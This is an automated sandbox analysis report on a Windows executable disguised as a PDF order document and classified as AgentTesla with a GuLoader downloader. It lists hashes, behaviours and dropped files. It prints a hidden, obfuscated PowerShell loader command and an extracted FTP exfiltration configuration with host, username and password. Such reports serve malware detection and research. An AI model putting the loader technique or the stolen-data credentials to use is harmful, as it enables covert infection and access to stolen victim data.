Overview

overview

10

Static

static

1

COMANDA FI...df.exe

windows7-x64

10

COMANDA FI...df.exe

windows10-2004-x64

5

Analysis

  • max time kernel
    149s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231025-en
  • resource tags

    arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
  • submitted
    08-12-2023 02:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    COMANDA FINALAZD33166-pdf.exe

  • Size

    699KB

  • MD5

    9444e71802e12684478363233fd62c92

  • SHA1

    f2b4bd9162b591b2a2f4202934145864e16053fb

  • SHA256

    844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41

  • SHA512

    fec573d2b453086f2ed0b8b11824e4626fb3712134a707f100b9b2704c489fffc1259646979b0c7ebeb032421163b35beed13d2772ac02a7dd08bf7723821805

  • SSDEEP

    12288:WwFGHEXEzFGj9F5qx5DJlm2HlzYmdMylgimtdYM3O0V7bbJ:W5HEXl9y1lrz7lgZtub0V7B

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.vvspijkenisse.nl
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    playingboyz231

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\COMANDA FINALAZD33166-pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\COMANDA FINALAZD33166-pdf.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2928
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Obscurantic=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Thermistor\Bruseren.Ple';$Ejendomsselskab=$Obscurantic.SubString(49841,3);.$Ejendomsselskab($Obscurantic)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1760
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2276

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini
    Filesize

    32B

    MD5

    a8ca1db6ae34f5e5c152094f44f92476

    SHA1

    9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

    SHA256

    1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

    SHA512

    e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Indoperere.Bag
    Filesize

    299KB

    MD5

    740aba5e4e37d6e24e6322b0fb20b7e7

    SHA1

    6b92a45c9b518e1fe51192c27bd81db51f2b90d4

    SHA256

    a47e49459ad8874693970dbe048982e5afd0ffee2644e03a3ac147be2d012609

    SHA512

    2aca469279d46bbfc84fac52ee8ebdf8b58256f9009e7651480bc8d0fb07327107ee71e526783e8553e499f38a4b977de3e3fdadd4bbda9c8df37423a21c81f3

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Thermistor\Bruseren.Ple
    Filesize

    48KB

    MD5

    b37bbcef093ffdd4c3be4dc919f6e830

    SHA1

    5ef5132e6f4021d672ba3844d2542e2258d22b72

    SHA256

    0c0dcc2234bc3f9baf5c35eb8ea2a77ca0e93015a6cb05de69890893a4b6daad

    SHA512

    9e8a8e2b84f366c0fc2edfa43c6781e88f99621549f0564efadd9d8facc975d1bbab048663b7c6e13ff53444d4f98d058664040dd6c67fde01a7500f38f3a9ba

    Download Submit

  • memory/1760-180-0x00000000026F0000-0x0000000002730000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1760-182-0x0000000077DF0000-0x0000000077EC6000-memory.dmp

    Filesize

    856KB

    Download

  • memory/1760-172-0x00000000026F0000-0x0000000002730000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1760-169-0x0000000074480000-0x0000000074A2B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1760-170-0x00000000026F0000-0x0000000002730000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1760-176-0x0000000002620000-0x0000000002624000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1760-177-0x0000000006040000-0x000000000849A000-memory.dmp

    Filesize

    36.4MB

    Download

  • memory/1760-178-0x0000000006040000-0x000000000849A000-memory.dmp

    Filesize

    36.4MB

    Download

  • memory/1760-179-0x0000000074480000-0x0000000074A2B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1760-171-0x00000000026F0000-0x0000000002730000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1760-181-0x0000000077C00000-0x0000000077DA9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/1760-168-0x0000000074480000-0x0000000074A2B000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1760-189-0x0000000006040000-0x000000000849A000-memory.dmp

    Filesize

    36.4MB

    Download

  • memory/1760-186-0x0000000006040000-0x000000000849A000-memory.dmp

    Filesize

    36.4MB

    Download

  • memory/2276-185-0x0000000077C00000-0x0000000077DA9000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/2276-187-0x000000006FF80000-0x0000000070FE2000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2276-188-0x0000000000BA0000-0x0000000002FFA000-memory.dmp

    Filesize

    36.4MB

    Download

  • memory/2276-183-0x0000000000BA0000-0x0000000002FFA000-memory.dmp

    Filesize

    36.4MB

    Download

  • memory/2276-191-0x000000006FF80000-0x000000006FFC0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/2276-192-0x000000006F890000-0x000000006FF7E000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/2276-194-0x0000000000BA0000-0x0000000002FFA000-memory.dmp

    Filesize

    36.4MB

    Download

  • memory/2276-197-0x000000006F890000-0x000000006FF7E000-memory.dmp

    Filesize

    6.9MB

    Download